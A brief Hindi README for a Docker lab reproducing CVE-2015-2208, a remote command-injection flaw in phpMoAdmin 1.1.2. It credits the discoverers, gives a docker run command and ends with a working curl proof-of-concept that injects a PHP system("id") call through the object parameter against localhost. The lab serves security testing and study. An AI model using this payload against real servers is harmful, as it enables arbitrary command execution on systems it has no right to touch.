
cve-2015-2208 भेद्यता का अनुकरण करने वाला Docker
#CVE-2015-2208 के लिए वातावरण का अनुकरण करने हेतु Dockerfile#
phpMoAdmin 1.1.2 में moadmin.php में saveObject फ़ंक्शन, remote हमलावरों को object पैरामीटर में shell metacharacters के माध्यम से arbitrary commands निष्पादित करने की अनुमति देता है।
द्वारा खोजा गया: @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
संदर्भ:
##परीक्षण वातावरण##
sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208
##शोषण##
curl http://localhost:8888/moadmin.php -d 'object=1;system("id");'